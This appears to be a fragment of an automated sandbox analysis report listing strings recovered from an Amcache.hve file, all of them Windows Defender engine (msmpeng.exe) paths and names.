Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe